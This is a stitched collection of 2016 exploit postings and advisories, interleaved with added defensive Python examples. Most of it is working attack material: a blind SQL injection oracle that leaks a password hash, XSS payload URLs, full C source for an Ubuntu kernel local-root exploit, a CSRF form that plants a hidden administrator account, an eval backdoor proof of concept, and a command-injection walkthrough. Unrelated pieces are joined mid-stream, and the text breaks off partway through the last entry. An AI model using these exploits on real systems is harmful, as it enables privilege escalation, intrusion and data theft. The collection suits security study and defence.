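    """ORDER BY cannot take bind parameters, so map the input onto a fixed set
    of identifiers and refuse everything else."""
    try:
        column = ALLOWED_SORT_COLUMNS[sort_by]
        direction = ALLOWED_DIRECTIONS[sort_type.lower()]
    except KeyError:
        raise ValueError("unsupported sort parameter") from None
    return f"SELECT media_id, title FROM media ORDER BY {column} {direction}"


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def oracle(db, position, guess):
    """One blind query through gallerySortBy: the CASE flips the row order when
    the guessed hash character is right, so the page itself answers yes/no."""
    probe = (f"(CASE WHEN (SELECT substr(password,{position},1) FROM admins)='{guess}' "
             f"THEN -media_id ELSE media_id END)")
    rows = db.execute(gallery_query_as_shipped(probe, "asc")).fetchall()
    return rows[0][0] == 2


def leak_hash(db, length):
    """Character-by-character extraction of the admin password hash."""
    leaked = ""
    for position in range(1, length + 1):
        for candidate in "0123456789abcdef":
            if oracle(db, position, candidate):
                leaked += candidate
                break
    return leaked


def demo():
    """Returns (leaked hash prefix, injection rejected by allowlist, ids sorted by title)."""
    db = make_db()
    leaked = leak_hash(db, 4)
    try:
        gallery_query_allowlisted("(CASE WHEN 1 THEN 1 END)", "asc")
        rejected = False
    except ValueError:
        rejected = True
    ids_by_title = [r[0] for r in db.execute(gallery_query_allowlisted("title", "asc"))]
    return leaked, rejected, ids_by_title


if __name__ == "__main__":
    print(demo())
```

Escaping does not help here because the injected text is an identifier, not a string literal; only the mapping from user-supplied names to a closed set of columns and directions removes the attacker's control over the SQL.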
# Cross Site Scripting Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameters are "mediaID" in the "workbox.php" file and "password" in the "/mgr.login.php" file, which are sent by the user and reflected by the application without sanitization.
#
# In order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID="><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is "photoID" in the "productshot.php" file, which is only partially sanitized, so an attacker can exploit this for full path disclosure only.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdint.h>   /* uint32_t/uint64_t used below */
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo == NULL) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules == NULL) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
/* RWX page at a fixed low address: 7 = PROT_READ|PROT_WRITE|PROT_EXEC,
 * 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS */
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support detected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
/* 7 = PROT_READ|PROT_WRITE|PROT_EXEC, 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS */
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
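The preconditions decr.c checks for (ip_tables loaded, no SMEP/SMAP) plus the one it assumes (unshare(CLONE_NEWUSER) permitted for an unprivileged user), as an added triage script that is not part of vnik's exploit: the pure functions take file contents so they can be exercised offline on constructed /proc samples, and assess_live() runs them against the host. The kernel.unprivileged_userns_clone sysctl exists on Debian/Ubuntu kernels but not in mainline, so an absent file is reported as inconclusive.

```python
import os

# Constructed samples of the files decr.c inspects.
SAMPLE_CPUINFO = (
    "processor\t: 0\n"
    "model name\t: QEMU Virtual CPU version 2.5+\n"
    "flags\t\t: fpu vme de pse tsc msr pae mce cx8 sse sse2 ht syscall nx lm\n"
)
SAMPLE_MODULES = (
    "iptable_filter 16384 0 - Live 0x0000000000000000\n"
    "ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n"
    "x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\n"
)
TESTED_KERNEL = "4.4.0-21-generic"   # the build the exploit header names


def cpu_flags(cpuinfo_text):
    """Flags of the first CPU as a set (decr.c greps the whole file, which can
    also match unrelated lines)."""
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            return set(line.split(":", 1)[1].split())
    return set()


def ip_tables_loaded(modules_text):
    """Same test as check_mod(): a /proc/modules line starting with ip_tables."""
    return any(line.split(" ", 1)[0] == "ip_tables" for line in modules_text.splitlines())


def unprivileged_userns_allowed(sysctl_text):
    """kernel.unprivileged_userns_clone (Debian/Ubuntu kernels; not in mainline):
    '1' lets a normal user do the unshare(CLONE_NEWUSER) that decr.c starts with.
    Returns None when the knob does not exist on this kernel."""
    text = sysctl_text.strip()
    if text == "":
        return None
    return text == "1"


def assess(kernel_release, cpuinfo_text, modules_text, sysctl_text):
    """Individual checks plus whether decr.c's own preconditions hold."""
    findings = {
        "kernel_is_tested_build": kernel_release == TESTED_KERNEL,
        "ip_tables_loaded": ip_tables_loaded(modules_text),
        "smep_or_smap": bool(cpu_flags(cpuinfo_text) & {"smep", "smap"}),
        "unprivileged_userns": unprivileged_userns_allowed(sysctl_text),
    }
    findings["decr_preconditions_met"] = (
        findings["ip_tables_loaded"]
        and not findings["smep_or_smap"]
        and findings["unprivileged_userns"] is not False
    )
    return findings


def assess_live():
    """Run the same checks against the running host (unreadable files count as empty)."""
    def read(path):
        try:
            with open(path) as f:
                return f.read()
        except OSError:
            return ""
    return assess(os.uname().release, read("/proc/cpuinfo"), read("/proc/modules"),
                  read("/proc/sys/kernel/unprivileged_userns_clone"))


if __name__ == "__main__":
    for key, value in assess_live().items():
        print(f"{key}: {value}")
```

On kernels that have the knob, kernel.unprivileged_userns_clone=0 makes the unshare() call in main() fail and the exploit quit; SMEP/SMAP only stops this particular variant, as the header's note about descr_v2.c says, so neither replaces the kernel update.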
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469, 6.4254, 6.4252, 6.4250, 6.4237, 6.4235, 5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature by adding a
task of type "exe" that runs a given binary with arguments of
their choosing. Because the task definition handler accepts the
request without a valid CSRF token (csrfToken=NoToken in the PoC
below), an attacker can get an authenticated administrator's
browser to create such a task and thereby execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1, Microsoft Windows Server 2012,
Microsoft Windows 7 Professional SP1 EN 64bit, Java/1.7.0_45,
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value="&quot;c:\\windows\\system32\\cmd.exe&quot;" />
<input type="hidden" name="exeArgs" value="&quot;/C net user EVIL pass123 /add &amp; net localgroup Administrators EVIL /add&quot;" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind SQL injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
    $result = mysqli_query( $db, 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
    $returned_rows = mysqli_num_rows( $result );
    $db_admin_user = mysqli_fetch_array( $result );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
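A runnable illustration of the recover_login query above, added here as an example rather than taken from the advisory or from Photostore: Python with an in-memory SQLite table standing in for the admins table (the $dbinfo[pre] prefix is assumed to be "ps_"; the rows and the quote-breaking payload are constructed), showing the concatenated query beside a parameterised one.

```python
"""Constructed model of the Photostore recover_login query (not vendor code):
string concatenation versus a bound parameter, on an in-memory SQLite table."""
import sqlite3
from typing import Dict, List, Tuple

# Assumed table prefix standing in for $dbinfo[pre] in the advisory.
TABLE_PREFIX = "ps_"

# Constructed rows; the password column holds placeholders, not real hashes.
ADMINS: List[Tuple[int, str, str, str]] = [
    (1, "alice", "<hash-placeholder-1>", "alice@example.com"),
    (2, "bob", "<hash-placeholder-2>", "bob@example.com"),
]


def make_db() -> sqlite3.Connection:
    """Create the admins table with the same columns the advisory's query reads."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE %sadmins (admin_id INTEGER, username TEXT, "
        "password TEXT, email TEXT)" % TABLE_PREFIX
    )
    con.executemany("INSERT INTO %sadmins VALUES (?, ?, ?, ?)" % TABLE_PREFIX, ADMINS)
    return con


def recover_login_vulnerable(con: sqlite3.Connection, email: str) -> List[tuple]:
    """Mirror of the advisory's query: the email value is spliced into the SQL
    text, so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT username,password,email,admin_id FROM " + TABLE_PREFIX
        + "admins where email = '" + email + "'"
    )
    return con.execute(sql).fetchall()


def recover_login_fixed(con: sqlite3.Connection, email: str) -> List[tuple]:
    """Hardened form: the email travels as a bound parameter, never as SQL text."""
    sql = (
        "SELECT username,password,email,admin_id FROM " + TABLE_PREFIX
        + "admins WHERE email = ?"
    )
    return con.execute(sql, (email,)).fetchall()


def demo() -> Dict[str, int]:
    """Row counts each variant returns for a benign and a quote-breaking input."""
    con = make_db()
    benign = "alice@example.com"
    # Constructed tautology; the advisory's request breaks the quote the same way.
    hostile = "' OR 1=1 --"
    return {
        "benign_vuln": len(recover_login_vulnerable(con, benign)),
        "benign_fixed": len(recover_login_fixed(con, benign)),
        "hostile_vuln": len(recover_login_vulnerable(con, hostile)),
        "hostile_fixed": len(recover_login_fixed(con, hostile)),
    }


if __name__ == "__main__":
    print(demo())
```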
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
public function dispatch(Request $request)
{
    if ($this->installed) {
        $response = $this->getEarlyDispatchResponse();
    }
    if (!isset($response)) {
        $collection = Route::getList();
        $context = new \Symfony\Component\Routing\RequestContext();
        $context->fromRequest($request);
        $matcher = new UrlMatcher($collection, $context);
        $path = rtrim($request->getPathInfo(), '/') . '/';
        try {
            $request->attributes->add($matcher->match($path));
            $matched = $matcher->match($path);
            $route = $collection->get($matched['_route']);
            Route::setRequest($request);
            $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows the request path to be
supplied within some HTTP headers (such as "X-Original-URL" and others). So it might be
possible to specify paths containing "dot-dot-slash" sequences without worrying about the URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory, or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionality),
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
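The following model of the path-override behaviour is an example added here, not Concrete5 or Symfony code: it shows which path the router ends up matching when an override header is honoured, the hardened setting that ignores such headers, and a check that flags header-supplied traversal. X-Rewrite-URL is the other IIS rewrite header Symfony's Request::prepareRequestUri() consulted; the helper names are assumptions.

```python
"""Constructed model of header-driven path selection (not framework code):
what gets routed, the hardened alternative, and a traversal check."""
from typing import Mapping, Tuple
from urllib.parse import unquote

# IIS rewrite headers that Symfony's Request::prepareRequestUri() consulted
# before falling back to REQUEST_URI. X-Original-URL is the header named in
# the advisory; X-Rewrite-URL is the other header on the same code path.
OVERRIDE_HEADERS = ("X-Original-URL", "X-Rewrite-URL")


def effective_path(request_uri: str, headers: Mapping[str, str],
                   trust_override_headers: bool = True) -> Tuple[str, str]:
    """Return (path, source): the path the router matches and where it came from.

    trust_override_headers=True models the vulnerable behaviour. The hardened
    setting is False: only the path the web server already normalised is used.
    """
    if trust_override_headers:
        lowered = {name.lower(): value for name, value in headers.items()}
        for name in OVERRIDE_HEADERS:
            value = lowered.get(name.lower())
            if value:
                return value.split("?", 1)[0], name
    return request_uri.split("?", 1)[0], "REQUEST_URI"


def has_traversal(path: str) -> bool:
    """True when the path still carries '..' segments, percent-encoded or not.

    The web server normalises REQUEST_URI, but a header value bypasses that
    step, so the check decodes once and then inspects the raw segments."""
    segments = unquote(path).split("/")
    return ".." in segments


def audit_request(request_uri: str, headers: Mapping[str, str]) -> dict:
    """Detection view: what the application will route and whether it looks
    like traversal that the server never had a chance to normalise."""
    path, source = effective_path(request_uri, headers)
    return {"path": path, "source": source, "suspicious": has_traversal(path)}


if __name__ == "__main__":
    # The request from the advisory, as the application would see it.
    print(audit_request("/concrete5/index.php",
                        {"X-Original-Url": "/tools/../../index"}))
    # Same request under the hardened setting: the header is ignored.
    print(effective_path("/concrete5/index.php",
                         {"X-Original-Url": "/tools/../../index"},
                         trust_override_headers=False))
```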
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
executed with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token, whether per session, per page, or per request. Administrative
authorization is based solely on the session cookie. Therefore,
it is possible to embed JavaScript into an HTML page so that when
an administrator is socially engineered into visiting the page,
the target device is accessed with that administrator's privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
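The following validator is an example added here, not KoreLogic's PoC or vendor code: it parses the key=value configuration format shown in this advisory, flags iptables.N.cmd values carrying shell metacharacters, and shows the hardened path of validating a rule against an allowlist and launching iptables with an argv list instead of a shell string. The allowlist regex and the sample configuration lines are constructed for this example.

```python
"""Constructed validator for AirOS-style configuration values (not vendor or
advisory code): spot command injection in iptables.N.cmd, then build a safe argv."""
import re
import shlex
from typing import List, Tuple

# Characters that let a value break out of the intended iptables argument
# string when it is interpolated into a shell command run as root.
SHELL_META = re.compile(r"[;&|`$()<>\n\\]")

# The keys the advisory identifies as reaching the shell: iptables.<n>.cmd
CMD_KEY = re.compile(r"^iptables\.\d+\.cmd$")

# Constructed allowlist for a custom firewall rule: one iptables action
# (-A CHAIN, -I CHAIN, ...) followed by option/value pairs of plain tokens.
SAFE_RULE = re.compile(
    r"^-[A-Z]\s+[A-Z_]+(?:\s+-{1,2}[a-z][a-z-]*\s+[A-Za-z0-9./:_-]+)*$"
)


def parse_config(text: str) -> List[Tuple[str, str]]:
    """Split key=value lines of the configuration into (key, value) pairs."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        pairs.append((key.strip(), value))
    return pairs


def find_injected_commands(text: str) -> List[Tuple[str, str]]:
    """Detection: iptables.N.cmd entries whose value carries shell metacharacters."""
    return [(key, value) for key, value in parse_config(text)
            if CMD_KEY.match(key) and SHELL_META.search(value)]


def is_safe_rule(value: str) -> bool:
    """Allowlist check: only a plain iptables rule made of simple tokens passes."""
    return SAFE_RULE.match(value) is not None


def build_iptables_argv(value: str) -> List[str]:
    """Hardened path: validate, then split into an argv for an execve-style launch.

    Handing a list (never a shell string) to the process launcher means even a
    value that slipped past the allowlist reaches iptables as arguments, not a shell."""
    if not is_safe_rule(value):
        raise ValueError("rejected iptables rule: %r" % value)
    return ["iptables"] + shlex.split(value)


# Constructed excerpt: the first cmd line is the injected value from the
# advisory's walkthrough, the second a benign rule added for contrast.
SAMPLE_CONFIG = """\
iptables.status=enabled
iptables.1.status=enabled
iptables.1.comment=
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
iptables.2.status=enabled
iptables.2.cmd=-A FIREWALL -p tcp --dport 22 -j ACCEPT
"""

if __name__ == "__main__":
    for key, value in find_injected_commands(SAMPLE_CONFIG):
        print("suspicious %s=%s" % (key, value))
    print(build_iptables_argv("-A FIREWALL -p tcp --dport 22 -j ACCEPT"))
```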
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
